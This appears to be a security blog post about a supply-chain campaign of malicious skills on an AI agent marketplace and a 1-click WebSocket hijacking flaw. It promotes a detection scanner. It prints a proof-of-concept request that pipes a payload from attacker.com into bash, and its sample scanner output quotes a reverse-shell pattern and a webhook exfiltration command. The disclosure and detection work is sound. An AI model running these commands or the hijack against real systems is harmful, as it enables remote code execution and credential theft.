341 Malicious Skills and a 1-Click RCE: Scanning OpenClaw Installations for ClawHavoc
TL;DR: The ClawHavoc campaign planted 341 malicious skills on ClawHub. Combined with GHSA-g8p2's 1-click RCE vulnerability, OpenClaw users face credential theft, reverse shells, and persistent backdoors. We built a scanner to detect it.
npx hackmyagent secure-openclaw
The OpenClaw Problem
OpenClaw emerged as a popular framework for building AI agents with tool access. Its skill marketplace, ClawHub, made it easy to extend agents with community-contributed capabilities. Too easy, as it turned out.
ClawHavoc Campaign
A coordinated supply chain attack planted 341 malicious skills on ClawHub over a 6-month period. These skills appeared legitimate but contained:
- Credential harvesters -- Exfiltrating SSH keys, AWS credentials, and crypto wallets
- Reverse shells -- Establishing persistent backdoor access
- ClickFix social engineering -- Prompting users to paste malicious commands
- Typosquatting -- Impersonating popular skills with near-identical names
GHSA-g8p2: 1-Click RCE via WebSocket Hijacking
A critical vulnerability in OpenClaw's gateway allowed any website to hijack the local WebSocket connection:
// Malicious website can connect to OpenClaw gateway
const ws = new WebSocket("ws://localhost:3100");
ws.send(JSON.stringify({
  action: "execute",
  skill: "shell",
  command: "curl attacker.com/payload | bash"
}));
// No authentication required. No user confirmation.
Impact: Visit a malicious website while OpenClaw is running = full system compromise.
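A gateway-side counterpart to the request above, as an added example that is not OpenClaw's code or its actual fix: handshake checks that refuse such a connection. The port comes from the snippet above; the allowed origin, the token, and the `auth.` subprotocol convention are assumptions.

```javascript
// Added example (not OpenClaw code): checks a local gateway can run on the
// HTTP upgrade request before accepting a WebSocket. Policy values are assumed.
const POLICY = {
  allowedHosts: new Set(["localhost:3100", "127.0.0.1:3100"]),
  allowedOrigins: new Set(["http://localhost:3100"]), // hypothetical local UI
  token: "constructed-sample-token",                  // per-install secret
};

// Constant-time comparison so the token cannot be recovered through timing.
function safeEqual(a, b) {
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// The token rides in Sec-WebSocket-Protocol as "auth.<token>" (assumed
// convention) because browsers cannot set Authorization on a WebSocket.
function tokenFrom(headers) {
  const offered = (headers["sec-websocket-protocol"] || "").split(",");
  const entry = offered.map((p) => p.trim()).find((p) => p.startsWith("auth."));
  return entry ? entry.slice(5) : "";
}

// headers: lower-cased request headers of the upgrade request.
function checkUpgrade(headers, policy = POLICY) {
  // Only loopback Host values pass: stops DNS rebinding and non-local access.
  const host = (headers["host"] || "").toLowerCase();
  if (!policy.allowedHosts.has(host)) return "reject: host";
  // Browsers always send Origin on WebSocket handshakes, and the same-origin
  // policy does not block the connection, so the server must check it.
  const origin = headers["origin"];
  if (origin !== undefined && !policy.allowedOrigins.has(origin)) return "reject: origin";
  // Origin is absent for non-browser clients, so every client needs the token.
  if (!safeEqual(tokenFrom(headers), policy.token)) return "reject: token";
  return "accept";
}

// Constructed handshakes: a foreign page, a rebinding page, a tokenless CLI, the UI.
const SAMPLES = [
  { host: "localhost:3100", origin: "https://evil.example" },
  { host: "evil.example:3100", origin: "http://evil.example:3100" },
  { host: "127.0.0.1:3100" },
  { host: "localhost:3100", origin: "http://localhost:3100",
    "sec-websocket-protocol": "gateway.v1, auth.constructed-sample-token" },
];
console.log(SAMPLES.map((h) => checkUpgrade(h)));
```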
Introducing secure-openclaw
We added 34 specialized security checks to HackMyAgent that scan OpenClaw installations for ClawHavoc indicators, GHSA-g8p2 misconfigurations, and other attack patterns.
# Scan your OpenClaw installation
npx hackmyagent secure-openclaw
# Auto-fix what can be fixed
npx hackmyagent secure-openclaw --fix
# JSON output for CI/CD
npx hackmyagent secure-openclaw --json
What It Detects
34 checks across 5 categories:
- SKILL Checks (12) -- Malicious skill detection
- HEARTBEAT Checks (6) -- Scheduled task abuse
- GATEWAY Checks (6) -- GHSA-g8p2 vulnerability detection (4 auto-fixable)
- CONFIG Checks (6) -- Insecure settings
- SUPPLY Checks (4) -- Supply chain attacks
Example Output
$ npx hackmyagent secure-openclaw ~/.moltbot

OpenClaw Security Report
Target: /Users/dev/.moltbot
Risk Level: CRITICAL

CRITICAL FINDINGS (3)

[SKILL-005] Reverse shell pattern detected
  File: skills/helper-utils/SKILL.md
  Line: 42
  Pattern: bash -i >& /dev/tcp/
  Remediation: Remove this skill immediately

[SKILL-004] Data exfiltration via webhook
  File: skills/sync-helper/SKILL.md
  Line: 28
  Pattern: curl -X POST https://webhook.site/...
  Remediation: Verify destination; remove if unauthorized

[GATEWAY-001] Gateway bound to 0.0.0.0
  File: openclaw.json
  Config: "host": "0.0.0.0"
  Remediation: Bind to 127.0.0.1 for local-only access

Summary: 3 critical, 5 high, 12 medium, 4 low
Exit code: 1 (failures detected)
The Bigger Picture
ClawHavoc and GHSA-g8p2 are symptoms of a deeper problem: AI agents are granted extensive system access without adequate identity verification, capability restrictions, or behavioral monitoring.
To properly secure AI agents, you need:
- Cryptographic identity -- Agents prove who they are
- Capability-based access control -- Agents can only do what they're explicitly authorized to do
- Continuous trust evaluation -- Behavioral anomalies trigger alerts
- Complete audit trails -- Every action logged and attributable
Scan Your OpenClaw Installation
34 security checks. One command. Free and open source.